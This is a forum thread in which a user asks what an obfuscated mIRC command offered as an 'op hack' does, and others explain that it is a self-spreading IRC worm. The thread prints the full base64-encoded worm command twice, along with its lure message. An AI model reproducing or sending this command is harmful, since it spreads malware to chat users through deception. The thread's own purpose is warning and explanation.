mIRC question :\

Question

Okay i was on irc today (austnet to specific) and some lamer told me to put this in to that main channel

As i'm not an idiot i told the person to go F@#$ off and ignored him.

He said this code lets u get OP in the chan

Obvously it doesn't or he would have been OP in the channel

So what does this do?

//$decode( d3JpdGUgxCBvbiAqOmpvaW46IzoudGltZXIgMSAzMCBpZiAoICRuaWNrICFpc29wICRjaGFuICkgLm1zZyAkbmljayBoZXkgJG5pY2sgdG8gZ2V0IE9QcyB1c2UgdGhpcyBoYWNrIGluIHRoZSBjaGFuIGJ1dCBTSEghIAM0Ly8kICQrIGRlY29kZSggJGVuY29kZSh3cml0ZSDEICRyZWFkKCRzY3JpcHQsbiwxKSxtKSAsbSkgJCAkKyBjaHIoMTI0KSAkICQgJCsgKyBkZWNvZGUoICRlbmNvZGUoLmxvYWQgLXJzIMQsbSkgLG0p ,m) | $decode( LmxvYWQgLXJzIMQ= ,m)

9 answers to this question

That definitely wouldn't give you op. It's a server-side thing. That look more like client-side command. Still I don't know what it is suppose to do. :ermm:

That is basically an irc worm, with no payload.

The unicode stuff decodes to a remote which is something along the lines of (this is from memory, i just *had* to find out what it did!)

on join 1:/msg $$1 'hey, type this to get ops in any channel! //$decode( d3JpdGUgxCBvbiAqOmpvaW46IzoudGltZXIgMSAzMCBpZiAoIC

RuaWNrICFpc29wICRjaGFuICkgLm1zZyAkbmljayBoZXkgJG5p

Y2sgdG8gZ2V0IE9QcyB1c2UgdGhpcyBoYWNrIGluIHRoZSBjaG

FuIGJ1dCBTSEghIAM0Ly8kICQrIGRlY29kZSggJGVuY29kZSh3

cml0ZSDEICRyZWFkKCRzY3JpcHQsbiwxKSxtKSAsbSkgJCAkKy

BjaHIoMTI0KSAkICQgJCsgKyBkZWNvZGUoICRlbmNvZGUoLmxv

YWQgLXJzIMQsbSkgLG0p ,m) | $decode( LmxvYWQgLXJzIMQ= ,m)"

So once you've run the decode line, it creates a file in c:mirc called a.(sumfin, txt prolly), which is pointed to in the remotes menu. Then when someone joins the # your in, you (unknowingly) msg them the above stuff, that you were sent in the first place.

Absolutely pointless, apart from to spread itself and give the writer some wierd pleasure!!!!!

long story short: you were wise to not run it. :)

hope thats clear enough!

Jon

Like i said, my curiousity took over, i loaded another instance of mirc, joined a safe (few mates only channel), and ran it, cycled the # etc, saw what it did, then looked through alias's and remotes.

someone had to :)

edit: sorry did not see someone had explained what it did..

(removed explanation)

But...

if anyone wants to check what a command does u can type //echo

the double // allows the command to echo with any aliases being executed

so /echo $time would just echo $time but //echo $time shows 23:18:43

From the resulting echo'ed result u can see it uses the write command .. which aint good if you dont know what it does

Hope that helps somewhat :)

np Jon

The help file is actually useful.. First time I ever found 1 to be useful..

I wrote a script. I would not have been able to do If it was not for the great help file :D